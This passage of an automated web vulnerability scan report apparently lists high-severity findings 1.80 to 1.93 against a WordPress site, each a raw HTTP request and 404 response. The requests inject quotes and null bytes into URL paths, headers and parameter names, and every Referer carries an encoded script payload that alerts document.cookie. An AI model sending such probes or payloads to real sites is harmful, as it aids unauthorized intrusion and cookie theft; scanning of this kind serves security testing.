<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.80. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.81. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.82. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.83. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.84. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:03 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.85. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.86. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:35 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.87. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.88. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.89. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:29 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.90. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokutils.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.91. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/xmlrpc.php

Issue detail

Request

GET /xmlrpc.php' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.92. http://www.installsoftware.com/xmlrpc.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/xmlrpc.php

Issue detail

Request

GET /xmlrpc.php HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.93. http://www.installsoftware.com/xmlrpc.php [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/xmlrpc.php

Issue detail

Request

GET /xmlrpc.php?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sat Feb 05 07:27:36 CST 2011.